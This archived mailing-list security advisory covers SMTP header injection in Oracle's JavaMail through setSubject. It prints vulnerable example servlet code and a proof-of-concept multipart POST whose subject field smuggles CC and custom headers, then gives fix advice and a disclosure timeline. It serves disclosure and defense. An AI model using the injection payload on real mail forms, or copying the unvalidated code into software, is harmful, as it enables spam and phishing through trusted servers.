lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4B70B66DA655F144855183C68062EE890199954F@trexchange.csnc.ch>
Date: Mon, 19 May 2014 15:30:51 +0200
From: "Alexandre Herzog" <alexandre.herzog@...c.ch>
To: <fulldisclosure@...lists.org>, <bugtraq@...urityfocus.com>
Subject: [FD] JavaMail SMTP Header Injection via method setSubject
	[CSNC-2014-001]

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:	JavaMail
# Vendor:	Oracle
# CSNC ID:	CSNC-2014-001 
# CVD ID:	<none>
# Subject:	SMTP Header Injection via method setSubject
# Risk:		Medium
# Effect:	Remotely exploitable
# Author:	Alexandre Herzog <alexandre.herzog@...c.ch>
# Date:		19.05.2014
#
#############################################################

Introduction:
-------------
The JavaMail API provides a platform-independent and 
protocol-independent framework to build mail and messaging applications. 
The JavaMail API is available as an optional package for use with the 
Java SE platform and is also included in the Java EE platform.[1] 

JavaMail does not check if the email subject contains a Carriage Return 
(CR) or a Line Feed (LF) character on POST multipart requests. This 
issue allows the injection of arbitrary SMTP headers in the generated
email. This flaw can be used for sending SPAM or other social 
engineering attacks (e.g. abusing a trusted server to send HTML emails
with malicious content). 


Affected:
---------
The following versions of JavaMail were tested and found vulnerable:
- 1.4.5 (included in the .war file used as demo from [2])
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])

 
Technical Description
---------------------
The tests were performed using the .war file downloaded from [2]. That 
code features an example on how to send a file per email using JSP and
a servlet. The relevant parts of this example are:
	[...]
	/**
	 * A utility class for sending e-mail message with attachment.
	 * @author www.codejava.net
	 *
	 */
	public class EmailUtility {
		 
		/**
		 * Sends an e-mail message from a SMTP host with a list of attached files.
		 *
		 */
		public static void sendEmailWithAttachment(String host, String port,
				final String userName, final String password, String toAddress,
				String subject, String message, List<File> attachedFiles)
						throws AddressException, MessagingException {
			// sets SMTP server properties
			Properties properties = new Properties();
			properties.put("mail.smtp.host", host);
			properties.put("mail.smtp.port", port);
			properties.put("mail.smtp.auth", "true");
			properties.put("mail.smtp.starttls.enable", "true");
			properties.put("mail.user", userName);
			properties.put("mail.password", password);
	 
			// creates a new session with an authenticator
			Authenticator auth = new Authenticator() {
				public PasswordAuthentication getPasswordAuthentication() {
					return new PasswordAuthentication(userName, password);
				}
			};
			Session session = Session.getInstance(properties, auth);
	 
			// creates a new e-mail message
			Message msg = new MimeMessage(session);
	 
			msg.setFrom(new InternetAddress(userName));
			InternetAddress[] toAddresses = { new InternetAddress(toAddress) };
			msg.setRecipients(Message.RecipientType.TO, toAddresses);
==>			msg.setSubject(subject);
			msg.setSentDate(new Date());
	[...]
	
	[...]
	/**
	 * A servlet that takes message details from user and send it as a new e-mail
	 * through an SMTP server. The e-mail message may contain attachments which
	 * are the files uploaded from client.
	 *
	 * @author www.codejava.net
	 *
	 */
	@WebServlet("/SendMailAttachServlet")
	
	// CSNC comment - this tag enables the processing of POST multipart requests
	@MultipartConfig(fileSizeThreshold = 1024 * 1024 * 2,   // 2MB
					maxFileSize = 1024 * 1024 * 10,         // 10MB
					maxRequestSize = 1024 * 1024 * 50)      // 50MB
	public class SendMailAttachServlet extends HttpServlet {
		private String host;
		private String port;
		private String user;
		private String pass;
	 
		public void init() {
			// reads SMTP server setting from web.xml file
			ServletContext context = getServletContext();
			host = context.getInitParameter("host");
			port = context.getInitParameter("port");
			user = context.getInitParameter("user");
			pass = context.getInitParameter("pass");
		}
	 
		/**
		 * handles form submission
		 */
		protected void doPost(HttpServletRequest request,
				HttpServletResponse response) throws ServletException, IOException {
			 
			List<File> uploadedFiles = saveUploadedFiles(request);
			 
			String recipient = request.getParameter("recipient");
==>			String subject = request.getParameter("subject");
			String content = request.getParameter("content");
	 
			String resultMessage = "";
	 
			try {
==>				EmailUtility.sendEmailWithAttachment(host, port, user, pass,
						recipient, subject, content, uploadedFiles);
				 
				resultMessage = "The e-mail was sent successfully";
			} catch (Exception ex) {


Below is a genuine request POST request for the example above, done
using "Content-Type: multipart" as it involves uploading a file: 
	POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
	Host: localhost:8080
	[...]
	Connection: keep-alive
	Content-Type: multipart/form-data; boundary=---------------------------205721274512326
	Content-Length: 1785

	-----------------------------205721274512326
	Content-Disposition: form-data; name="recipient"

	test@[redacted]
	-----------------------------205721274512326
	Content-Disposition: form-data; name="subject"

	With javax.mail.1.5.1
	-----------------------------205721274512326
	Content-Disposition: form-data; name="content"

	SMTP header injection test
	-----------------------------205721274512326
	Content-Disposition: form-data; name="file"; filename="NOTICE"
	Content-Type: application/octet-stream

	Apache Tomcat
	Copyright 1999-2012 The Apache Software Foundation 
	[...]
	
	
"Content-Type: multipart" allows us to submit a string containing a CR 
or LF without having to use HEX characters %0A and %0D nor \n and \r. In 
the JavaMail case, we abuse this feature to inject additional SMTP 
headers through the Subject parameter in the request: 
	POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
	Host: localhost:8080
	[...]
	Connection: keep-alive
	Content-Type: multipart/form-data; boundary=---------------------------205721274512326
	Content-Length: 1839

	-----------------------------205721274512326
	Content-Disposition: form-data; name="recipient"

	test@[redacted]
	-----------------------------205721274512326
	Content-Disposition: form-data; name="subject"

	With javax.mail.1.5.1
==>	CC: injected.header@[redacted]
==>	X-other-header: foo bar
	-----------------------------205721274512326
	Content-Disposition: form-data; name="content"

	SMTP header injection test
	-----------------------------205721274512326
	Content-Disposition: form-data; name="file"; filename="NOTICE"
	Content-Type: application/octet-stream

	Apache Tomcat
	Copyright 1999-2012 The Apache Software Foundation
	[...]
	
This email is sent successfully and is received by the recipient under 
the following form, where the injected SMTP headers are clearly visible: 
	[...]
	From: [redacted]@gmail.com
	To: test@[redacted]
	Message-ID: <52c2e778.01030e0a.7154.fffff0c2@...google.com>
	Subject: With javax.mail.1.5.1
	CC: injected.header@[redacted]
==>	X-other-header: foo bar
	MIME-Version: 1.0
	Content-Type: multipart/mixed; 
		boundary="----=_Part_0_1681986934.1388504951836"
	[...]

	------=_Part_0_1681986934.1388504951836
	Content-Type: text/html; charset=us-ascii
	Content-Transfer-Encoding: 7bit

	SMTP header injection test
	------=_Part_0_1681986934.1388504951836
	Content-Type: application/octet-stream; name=NOTICE
	Content-Transfer-Encoding: 7bit
	Content-Disposition: attachment; filename=NOTICE

	Apache Tomcat
	Copyright 1999-2012 The Apache Software Foundation
	[...]


The same behavior can be observed when using JavaMail 1.4.5 (bundled by 
default in the example .war [2]) instead of the latest 1.5.1 JavaMail 
version. 


Workaround / Fix:
-----------------
Ensure your application strictly follows the JavaMail API and ensures 
the subject string does not contain any line breaks (as stated in some 
parts of the API [4]). An alternative would be to fix the setSubject 
method of JavaMail by either disallowing the usage of CR/LF characters 
or appending a space after each CR/LF character to be RFC compliant (see 
2.2.3 Long Header Fields of RFC 2822 [5]). 

Oracle issued the following statement regarding this matter: "The 
assessment from our engineering team is that this is not a bug in 
JavaMail API. The application is responsible to perform some input 
validation. In this particular case, the application is responsible for 
ensuring that the subject string does not contain any line breaks. The 
code demonstrated the issue is not an Oracle sample. Therefore, we are 
closing the issue as not-a-bug." 


Timeline:
---------
2014-05-19:		Global publication of the advisory
2014-03-19:		Advisory sent to Compass Security's customers
2014-02-19:		Got confirmation from Oracle they agree our publication
				schedule
2014-02-18:		Informed Oracle that we plan to publish details of this
				issue to our customer this week and to the general
				public in a month
2014-02-05:		Informed Oracle we consider publishing this information
2014-02-04:		Response from Oracle: is not considered a bug
2014-01-23:		Status report from Oracle mentioning the case being
				"Under investigation / Being fixed in main codeline"
2014-01-01:		Reception acknowledgement from Oracle
2014-01-01:		Sending advisory and PoC to Oracle
2014-01-01:		Isolation and reproduction of an issue discovered
				previously by the author


References:
-----------
[1] http://www.oracle.com/technetwork/java/javamail/index.html
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-jsp-servlet-and-javamail
[3] https://java.net/projects/javamail/pages/Home
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessage.html#setSubject(java.lang.String)
[5] http://www.ietf.org/rfc/rfc2822.txt



--
Alexandre Herzog, CTO, Compass Security Schweiz AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
http://www.csnc.ch/


Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5234 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ